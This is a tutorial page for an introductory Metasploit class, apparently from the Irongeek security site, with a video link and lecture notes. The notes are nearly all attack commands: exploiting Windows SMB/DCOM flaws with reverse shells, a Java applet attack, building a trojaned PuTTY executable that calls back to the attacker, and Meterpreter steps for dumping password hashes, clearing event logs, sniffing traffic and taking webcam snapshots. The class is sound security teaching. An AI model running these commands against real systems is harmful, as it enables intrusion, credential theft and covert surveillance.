Intro to Metasploit Class at IU Southeast (Hacking Illustrated Series InfoSec Tutorial Videos)

Intro to Metasploit Class at IU Southeast (Hacking Illustrated Series InfoSec Tutorial Videos) Intro to Metasploit Class at IU Southeast

This is a class we did to introduce students to Metasploit at IU Southeast. Special guest lecturer Jeremy Druin (@webpwnize). To follow along, I recommend downloading Kali Linux. Bing thanks to http://www.offensive-security.com/ and please donate to http://www.hackersforcharity.org/

Download:
https://archive.org/download/IntoToMetasploitClassAtIUSoutheast/Into%20to%20Metasploit%20Class%20at%20IU%20Southeast.mp4

Notes:

Metasploit Notes 1
(Based on http://www.offensive-security.com/metasploit-unleashed)

Show directory structure

cd /opt/metasploit/apps/pro/msf3

ls

cd modules

<tab it out>

cd /opt/metasploit/apps/pro/msf3

Updates

msfupdate

apt-get update;apt-get dist-upgrade

msfcli

msfcli exploits/windows/dcerpc/ms03_026_dcom O

msfcli exploits/windows/dcerpc/ms03_026_dcom P

msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP lhost=METASPLOIT-IP payload=windows/shell_reverse_tcp E

msfcli exploits/windows/dcerpc/ms03_026_dcom rhost= TARGET-IP E

msfconsole
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali

service postgresql start

service metasploit start

update-rc.d postgresql enable

update-rc.d metasploit enable

help

?

ping irongeek.com

search ms08

use exploit/windows/smb/ms08_067_netapi

back

info exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi

show options

set rhost TARGET-IP

exploit

run

active vs passive

use exploit/multi/browser/java_signed_applet

set lport 3456

set SRVPORT 3245

set lhost METASPLOIT-IP

set APPLETNAME "Adrians_funapp"

set CERTCN irongeek.com

set ENCODER x86/shikata_ga_nai

set payload windows/meterpreter/reverse_tcp

set uripath /

run

jobs

kill 0

Social Engineering Toolkit Way

setoolkit

1 2 1 2

no

METASPLOIT-IP

irongeek.com

2 3

445

Meterpreter

ls

sysinfo

shell

exit

help

help core

background

sessions -l

session -i 1

cd

pwd

cat

clearev #Clear logs

getsystem

ps

migrate 608

getuid

hashdump

load -l

load sniffer

sniffer_interfaces

sniffer_start 1

sniffer_stats 1

sniffer_dump 1 /root/my.pcap

sniffer_stop 1

screenshot

resource somefile

run vnc

Using a Scanner

msfconsole

db_status

workspace

hosts

use auxiliary/scanner/smb/smb_version

set rhosts TARGET-IP/24

set threads 100

run

hosts

Trojans

/etc/init.d/apache2 start

cd /var/www

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

msfpayload windows/meterpreter/reverse_tcp LHOST= METASPLOIT-IP LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe

Or

msfvenom -p windows/meterpreter/reverse_tcp LHOST= METASPLOIT-IP LPORT=443 -x /var/www/putty.exe -e x86/shikata_ga_nai -i 15 -k -f exe >some.exe

(in msfconsole)

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST METASPLOIT-IP

set LPORT 443

exploit

(run the exe, and show some other things)

webcam_list

webcam_snap 1

run webcam

Armitage as Metasploit GUI

service postgresql start

service metasploit start

armitage

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.